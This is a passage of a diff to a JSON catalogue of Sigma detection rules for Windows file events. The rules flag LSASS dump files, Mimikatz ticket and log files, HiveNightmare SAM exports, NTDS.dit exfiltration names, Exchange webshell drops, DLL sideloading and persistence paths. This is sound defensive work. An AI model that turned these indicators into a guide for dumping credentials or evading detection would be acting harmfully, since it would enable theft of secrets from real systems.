\"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/09", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_error_handler_cmd_persistence.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/", - "https://github.com/last-byte/PersistenceSniper", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_error_handler_cmd_persistence.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "15904280-565c-4b73-9303-3291f964e7f9", - "value": "Persistence Via ErrorHandler.Cmd" - }, - { - "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", - "meta": { - "author": "Florian Roth (rule), MSTI (query, idea)", - "creation_date": "2022/10/01", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_exchange_webshell_drop.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", - "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", - "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "bd1212e5-78da-431e-95fa-c58e3237a8e6", - "value": "Suspicious ASPX File Drop by Exchange" - }, - { - "description": "Detects suspicious file type dropped by an Exchange component in IIS", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/10/04", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_exchange_webshell_drop_suspicious.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", - "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", - "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1190", - "attack.initial_access", - "attack.t1505.003" - ] - }, - "uuid": "6b269392-9eba-40b5-acb6-55c882b20ba6", - "value": "Suspicious File Drop by Exchange" - }, - { - "description": "Detects default lsass dump filename from SafetyKatz", - "meta": { - "author": "Markus Neis", - "creation_date": "2018/07/24", - "falsepositive": [ - "Rare legitimate files with similar filename structure" - ], - "filename": "file_event_win_ghostpack_safetykatz.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/GhostPack/SafetyKatz", - "https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ghostpack_safetykatz.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "e074832a-eada-4fd7-94a1-10642b130e16", - "value": "SafetyKatz Default Dump Filename" - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "meta": { - "author": "frack113", - "creation_date": "2022/02/13", - "falsepositive": [ - "Legitimate use" - ], - "filename": "file_event_win_gotoopener_artefact.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_gotoopener_artefact.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "5d756aee-ad3e-4306-ad95-cb1abec48de2", - "value": "GoToAssist Temporary Installation Artefact" - }, - { - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/02/04", - "falsepositive": [ - "Very unlikely" - ], - "filename": "file_event_win_hack_dumpert.yml", - "level": "critical", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/outflanknl/Dumpert", - "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hack_dumpert.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", - "value": "Dumpert Process Dumper Default File" - }, - { - "description": "Detects files written by the different tools that exploit HiveNightmare", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/07/23", - "falsepositive": [ - "Files that accidentally contain these strings" - ], - "filename": "file_event_win_hivenightmare_file_exports.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/GossiTheDog/HiveNightmare", - "https://github.com/FireFart/hivenightmare/", - "https://github.com/WiredPulse/Invoke-HiveNightmare", - "https://twitter.com/cube0x0/status/1418920190759378944", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hivenightmare_file_exports.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.001", - "cve.2021.36934" - ] - }, - "uuid": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", - "value": "Typical HiveNightmare SAM File Export" - }, - { - "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/11/29", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_hktl_nppspy.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy", - "https://twitter.com/0gtweet/status/1465282548494487554", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml" - ], - "tags": [ - "attack.credential_access" - ] - }, - "uuid": "cad1fe90-2406-44dc-bd03-59d0b58fe722", - "value": "NPPSpy Hacktool Usage" - }, - { - "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.", - "meta": { - "author": "Tim Rauch (rule), Elastic (idea)", - "creation_date": "2022/10/21", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc", - "https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml" - ], - "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1574", - "attack.t1574.001", - "attack.defense_evasion" - ] - }, - "uuid": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", - "value": "Potential Initial Access via DLL Search Order Hijacking" - }, - { - "description": "TeamViewer_Desktop.exe is create during install", - "meta": { - "author": "frack113", - "creation_date": "2022/01/28", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_install_teamviewer_desktop.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-1---teamviewer-files-detected-test-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_install_teamviewer_desktop.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", - "value": "Installation of TeamViewer Desktop" - }, - { - "description": "Detects the presence and execution of Inveigh via dropped artefacts", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/24", - "falsepositive": [ - "Unlikely" - ], - "filename": "file_event_win_inveigh_artefacts.yml", - "level": "critical", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs", - "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs", - "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_inveigh_artefacts.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", - "value": "Inveigh Execution Artefacts" - }, - { - "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", - "meta": { - "author": "frack113", - "creation_date": "2022/08/12", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_iphlpapi_dll_sideloading.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", - "value": "Malicious DLL File Dropped in the Teams or OneDrive Folder" - }, - { - "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", - "meta": { - "author": "@sam0x90", - "creation_date": "2022/07/30", - "falsepositive": [ - "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" - ], - "filename": "file_event_win_iso_file_mount.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/Sam0x90/status/1552011547974696960", - "https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_mount.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ] - }, - "uuid": "2f9356ae-bf43-41b8-b858-4496d83b2acb", - "value": "ISO File Created Within Temp Folders" - }, - { - "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/11", - "falsepositive": [ - "Cases in which a user mounts an image file for legitimate reasons" - ], - "filename": "file_event_win_iso_file_recent.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", - "https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/", - "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_recent.yml" - ], - "tags": "No established tags" - }, - "uuid": "4358e5a5-7542-4dcb-b9f3-87667371839b", - "value": "ISO or Image Mount Indicator in Recent Files" - }, - { - "description": "Detects programs on a Windows system that should not write an archive to disk", - "meta": { - "author": "frack113, Florian Roth", - "creation_date": "2022/08/21", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_legitimate_app_dropping_archive.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_archive.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "654fcc6d-840d-4844-9b07-2c3300e54a26", - "value": "Legitimate Application Dropped Archive" - }, { "description": "Detects programs on a Windows system that should not write executables to disk", "meta": { @@ -23043,453 +24594,25 @@ "value": "Legitimate Application Dropped Executable" }, { - "description": "Detects programs on a Windows system that should not write scripts to disk", + "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", "meta": { - "author": "frack113, Florian Roth", - "creation_date": "2022/08/21", + "author": "Tim Shelton", + "creation_date": "2022/01/10", "falsepositive": [ "Unknown" ], - "filename": "file_event_win_legitimate_app_dropping_script.yml", + "filename": "file_event_win_cscript_wscript_dropper.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_script.yml" + "WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cscript_wscript_dropper.yml" ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] + "tags": "No established tags" }, - "uuid": "7d604714-e071-49ff-8726-edeb95a70679", - "value": "Legitimate Application Dropped Script" - }, - { - "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/11/15", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_lsass_dump.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.google.com/search?q=procdump+lsass", - "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", - "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", - "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", - "https://github.com/helpsystems/nanodump", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_dump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "a5a2d357-1ab8-4675-a967-ef9990a59391", - "value": "LSASS Process Memory Dump Files" - }, - { - "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", - "meta": { - "author": "Teymur Kheirkhabarov, oscd.community", - "creation_date": "2019/10/22", - "falsepositive": [ - "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", - "Dumps of another process that contains lsass in its process name (substring)" - ], - "filename": "file_event_win_lsass_memory_dump_file_creation.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_memory_dump_file_creation.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", - "value": "LSASS Memory Dump File Creation" - }, - { - "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/06/27", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_lsass_werfault_dump.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/helpsystems/nanodump", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", - "value": "WerFault LSASS Process Memory Dump" - }, - { - "description": "A office file with macro is created from a commandline or a script", - "meta": { - "author": "frack113", - "creation_date": "2022/01/23", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_macro_file.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md", - "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_macro_file.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ] - }, - "uuid": "b1c50487-1967-4315-a026-6491686d860e", - "value": "Dump Office Macro Files from Commandline" - }, - { - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "meta": { - "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", - "creation_date": "2017/11/10", - "falsepositive": "No established falsepositives", - "filename": "file_event_win_mal_adwind.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", - "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_adwind.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" - ] - }, - "uuid": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", - "value": "Adwind RAT / JRAT File Artifact" - }, - { - "description": "Detects Octopus Scanner Malware.", - "meta": { - "author": "NVISO", - "creation_date": "2020/06/09", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_mal_octopus_scanner.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_octopus_scanner.yml" - ], - "tags": [ - "attack.t1195", - "attack.t1195.001" - ] - }, - "uuid": "805c55d9-31e6-4846-9878-c34c75054fe9", - "value": "Octopus Scanner Malware" - }, - { - "description": "Malware can use mountable Virtual Hard Disk .vhd file to encapsulate payloads and evade security controls", - "meta": { - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", - "creation_date": "2021/10/25", - "falsepositive": [ - "Legitimate user creation" - ], - "filename": "file_event_win_mal_vhd_download.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/intelligence-insights-october-2021/", - "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", - "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_vhd_download.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ] - }, - "uuid": "8468111a-ef07-4654-903b-b863a80bbc95", - "value": "Suspicious VHD Image Download From Browser" - }, - { - "description": "Detects the creation of files that contain Kerberos tickets based on an extension used by the popular tool Mimikatz", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/11/08", - "falsepositive": [ - "Unlikely" - ], - "filename": "file_event_win_mimikatz_kirbi_file_creation.yml", - "level": "critical", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://cobalt.io/blog/kerberoast-attack-techniques", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mimikatz_kirbi_file_creation.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558" - ] - }, - "uuid": "9e099d99-44c2-42b6-a6d8-54c3545cab29", - "value": "Mimikatz Kirbi File Creation" - }, - { - "description": "Detects Mimikatz MemSSP default log file creation", - "meta": { - "author": "David ANDRE", - "creation_date": "2021/12/20", - "falsepositive": [ - "Unlikely" - ], - "filename": "file_event_win_mimimaktz_memssp_log_file.yml", - "level": "critical", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://pentestlab.blog/2019/10/21/persistence-security-support-provider/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mimimaktz_memssp_log_file.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ] - }, - "uuid": "034affe8-6170-11ec-844f-0f78aa0c4d66", - "value": "Mimikatz MemSSP Default Log File Creation" - }, - { - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/05/06", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_moriya_rootkit.yml", - "level": "critical", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_moriya_rootkit.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ] - }, - "uuid": "a1507d71-0b60-44f6-b17c-bf53220fdd88", - "value": "Moriya Rootkit" - }, - { - "description": "Detects msdt.exe creating files in suspicious directories", - "meta": { - "author": "Vadim Varganov, Florian Roth", - "creation_date": "2022/08/24", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_msdt_autorun.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", - "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_msdt_autorun.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001", - "cve.2022.30190" - ] - }, - "uuid": "318557a5-150c-4c8d-b70e-a9910e199857", - "value": "MSDT.exe Creates Files in Autorun Directory" - }, - { - "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context", - "meta": { - "author": "frack113", - "creation_date": "2022/11/18", - "falsepositive": [ - "Legitimate use" - ], - "filename": "file_event_win_net_cli_artefact.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", - "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", - "value": "NET CLR Binary Execution Usage Log Artifact" - }, - { - "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/05", - "falsepositive": [ - "Unlikely" - ], - "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution" - ] - }, - "uuid": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", - "value": "Creation Suspicious File In Uncommon AppData Folder" - }, - { - "description": "An attacker may execute an application as a .SCR File (Screensaver) using rundll32.exe desk.cpl,InstallScreenSaver", - "meta": { - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", - "creation_date": "2022/04/27", - "falsepositive": [ - "The installation of new screen savers." - ], - "filename": "file_event_win_new_src_file.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Libraries/Desk/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_src_file.yml" - ], - "tags": [ - "attack.t1218.011", - "attack.defense_evasion" - ] - }, - "uuid": "c048f047-7e2a-4888-b302-55f509d4a91d", - "value": "SCR File Write Event" - }, - { - "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". Which could indicates possible persistence", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/10", - "falsepositive": [ - "Possible FPs during first installation of Notepad++", - "Legitimate use of custom plugins to enhance notepad++ functionality by users" - ], - "filename": "file_event_win_notepad_plus_plus_persistence.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "54127bd4-f541-4ac3-afdb-ea073f63f692", - "value": "Persistence Via Notepad++ Plugins" - }, - { - "description": "Detects suspicious creations of a file named ntds.dit, e.g. by a PowerShell parent or in a suspicious directory or a suspicious one liner", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/11", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_ntds_dit.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", - "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", - "https://pentestlab.blog/tag/ntds-dit/", - "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ] - }, - "uuid": "4e7050dd-e548-483f-b7d6-527ab4fa784d", - "value": "Suspicious NTDS.DIT Creation" - }, - { - "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/11", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_ntds_exfil_tools.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb", - "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1", - "https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ] - }, - "uuid": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", - "value": "Suspicious NTDS Exfil Filename Patterns" + "uuid": "002bdb95-0cf1-46a6-9e08-d38c128a6127", + "value": "WScript or CScript Dropper - File" }, { "description": "Detects add-ins that load when Microsoft Word or Excel starts (.wll/.xll are simply .dll fit for Word or Excel).", @@ -23543,482 +24666,316 @@ "value": "Outlook C2 Macro Creation" }, { - "description": "Detects the creation of new Outlook form which can contain malicious code", - "meta": { - "author": "Tobias Michalski", - "creation_date": "2021/06/10", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_outlook_newform.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", - 